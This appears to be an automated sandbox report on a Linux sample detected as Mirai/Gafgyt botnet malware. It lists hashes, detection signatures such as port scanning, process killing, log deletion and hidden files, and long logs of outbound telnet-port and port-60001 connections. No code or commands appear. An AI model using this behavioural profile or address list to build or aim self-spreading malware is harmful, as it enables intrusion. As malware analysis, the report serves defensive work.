Linux Analysis Report VAkpLB9NSD

Overview

General Information

Sample Name: VAkpLB9NSD
Analysis ID: 553467
MD5: 0825b7f6b6e9da31e17fd46e3a10740c
SHA1: 7881665597156c61b9861714a3336de2033111f1
SHA256: 3501f6be009a942c0511ff6a5b476722881edaf92a08e296310784be1beedee0
Tags: 32elfintelmirai
Infos:

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: VAkpLB9NSD Virustotal: Detection: 34% Perma Link
Source: VAkpLB9NSD ReversingLabs: Detection: 39%

Bitcoin Miner:

barindex
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5375) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5496) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5635) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5678) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pulseaudio (PID: 5749) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5868) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5913) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5983) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36462 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35694 version: TLS 1.2

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 492 INFO TELNET login failed 110.180.117.97:23 -> 192.168.2.23:51002
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.3.92.97:23 -> 192.168.2.23:33908
Source: Traffic Snort IDS: 492 INFO TELNET login failed 189.3.92.97:23 -> 192.168.2.23:33930
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 36712 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 36712 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 54592 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58692 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58692 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33338 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52596 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48484 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57906 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 40610 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53292 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39546 -> 60001
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 77.95.10.157:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 202.87.60.165:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 152.117.191.72:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 160.131.17.133:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 189.163.109.36:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 207.145.115.10:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 104.120.150.99:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 107.250.190.158:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 35.64.46.99:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 40.188.154.159:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 44.223.115.5:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 176.236.39.187:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 20.142.145.139:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 159.159.93.217:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 43.224.253.60:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 181.96.140.25:2323
Source: global traffic TCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 18.36.123.157:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 77.87.10.157:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 107.169.124.146:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 178.92.12.53:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 78.225.1.63:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 19.158.152.54:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 134.104.209.38:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 12.162.243.23:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 205.161.107.16:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 170.190.17.153:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 59.146.248.4:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 48.15.22.181:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 175.228.220.211:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 13.205.62.149:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 177.166.207.1:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 69.188.87.9:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 76.146.217.86:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 119.129.215.154:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 219.172.9.109:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 58.247.72.122:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 158.0.47.79:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 133.121.139.208:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 211.234.34.20:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 66.26.34.139:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 166.9.66.58:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 35.63.78.23:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 216.85.115.80:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 90.5.179.235:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 68.145.212.243:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 25.238.21.153:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 185.253.106.184:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 169.239.13.153:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 194.158.130.187:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 156.255.233.181:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 90.228.69.51:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 150.180.240.159:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 85.76.202.25:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 35.164.69.223:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 117.170.118.4:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 94.87.201.37:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 32.134.107.37:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 176.179.197.220:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 97.54.121.69:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 54.46.179.211:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 176.184.54.56:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 155.34.47.9:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 109.101.134.4:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 209.19.44.53:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 106.255.119.121:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 180.83.205.39:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 202.71.235.107:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 83.108.68.228:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 194.139.197.96:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 37.207.206.225:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 166.2.165.92:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 156.110.81.155:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 171.141.214.247:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 99.138.48.187:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 149.5.207.177:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 162.114.39.121:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 74.111.141.43:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 78.46.125.222:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 2.167.162.133:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 160.136.82.82:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 37.229.31.123:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 107.234.158.211:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 18.209.18.228:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 165.254.209.50:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 219.82.212.133:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 136.228.115.177:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 184.211.132.68:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 221.100.105.43:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 18.247.32.195:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 47.140.244.121:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 18.86.124.103:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 101.2.150.58:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 58.129.36.34:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 1.175.142.135:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 130.59.238.84:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 160.16.75.79:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 9.8.115.14:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 218.113.177.25:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 45.30.197.215:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 44.197.137.10:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 20.132.133.97:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 152.5.113.89:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 45.33.33.31:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 143.207.166.62:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 213.188.28.55:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 144.79.8.130:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 78.56.249.103:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 42.102.83.252:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 45.92.26.12:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 9.117.213.9:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 163.8.86.68:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 133.225.85.141:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 222.209.203.37:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 12.170.45.105:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 35.188.116.233:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 204.65.235.154:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 44.66.98.125:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 80.66.16.151:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 124.228.69.78:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 150.234.22.18:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 148.56.254.160:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 4.95.234.116:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 70.227.31.120:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 126.18.116.23:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 52.66.242.54:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 203.132.252.167:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 112.27.125.81:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 92.240.189.46:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 218.36.168.55:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 98.104.186.240:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 198.42.245.28:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 93.49.67.22:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 83.242.218.207:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 153.135.18.149:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 184.59.44.213:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 219.206.60.76:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 135.169.71.76:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 189.15.87.229:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 53.11.143.155:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 59.145.17.161:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 99.42.245.206:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 128.138.99.46:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 152.81.180.172:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 35.99.222.68:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 157.248.78.28:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 45.151.1.164:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 23.170.173.61:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 110.225.197.17:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 94.107.3.119:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 195.35.122.254:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 223.122.248.3:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 36.113.136.213:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 97.129.237.223:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 66.213.144.96:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 45.63.173.56:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 36.16.127.8:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 34.179.132.2:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 39.225.9.128:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 138.144.242.168:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 100.59.20.114:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 203.218.57.27:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 144.78.173.177:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 156.202.244.132:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 184.85.200.0:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 12.103.219.255:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 88.92.198.130:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 62.255.14.23:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 49.165.241.52:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 191.128.212.12:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 206.149.5.186:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 121.228.75.217:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 204.154.24.6:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 161.175.151.221:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 85.121.186.83:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 98.91.101.200:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 223.105.94.250:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 104.132.179.27:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 97.54.114.222:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 171.102.13.175:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 112.114.94.30:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 154.37.70.146:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 75.228.14.67:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 141.45.30.133:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 196.53.234.170:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 23.14.240.208:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 143.135.131.229:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 99.184.129.123:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 130.121.202.124:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 135.235.135.146:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 84.172.106.219:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 93.205.206.139:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 213.37.32.192:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 23.183.135.13:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 212.233.166.54:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 182.34.225.105:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 130.120.198.188:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 212.163.112.232:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 195.154.184.27:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 87.115.119.123:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 145.223.47.214:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 207.238.217.90:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 84.248.141.61:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 18.62.91.13:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 137.0.161.121:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 89.212.127.218:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 38.61.77.202:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 187.26.132.148:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 213.254.110.241:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 118.185.150.240:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 99.39.214.80:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 143.148.128.32:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 63.159.160.168:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 223.178.183.194:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 175.91.32.79:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 17.27.143.236:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 128.94.219.197:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 144.4.139.13:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 58.96.147.76:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 174.175.231.65:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 63.209.16.135:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 216.30.97.27:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 9.3.25.85:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 209.81.110.242:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 23.159.247.35:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 139.114.68.95:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 202.112.22.185:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 196.168.81.93:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 176.172.109.236:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 80.227.46.247:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 82.8.82.51:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 119.84.191.223:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 36.195.35.253:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 204.212.177.19:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 194.3.207.236:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 83.241.240.166:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 165.50.0.5:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 152.24.215.252:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 130.205.158.246:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 137.130.180.12:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 163.241.149.214:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 169.154.0.239:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 54.43.29.247:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 71.142.111.129:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 141.95.213.161:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 41.98.194.159:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 47.23.174.40:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 213.122.246.51:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 136.32.232.5:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 182.123.14.64:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 97.19.85.51:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 134.121.92.215:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 49.160.71.237:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 58.61.43.229:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 36.204.222.50:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 51.81.119.32:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 114.179.16.67:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 94.185.193.14:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 45.241.65.168:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 9.238.84.167:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 19.94.35.253:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 1.20.229.123:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 193.119.184.111:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 90.99.75.111:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 4.4.154.85:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 208.18.153.180:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 120.209.26.170:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 54.143.18.177:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 206.44.189.81:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 66.109.62.40:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 59.191.205.119:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 71.185.89.111:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 133.50.139.93:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 91.146.242.105:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 124.217.183.171:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 222.53.211.109:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 198.149.23.136:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 79.62.164.5:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 47.11.116.10:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 59.101.17.190:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 164.111.204.86:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 102.183.237.90:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 173.63.90.249:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 165.246.127.213:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 107.255.114.200:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 91.232.111.61:60001
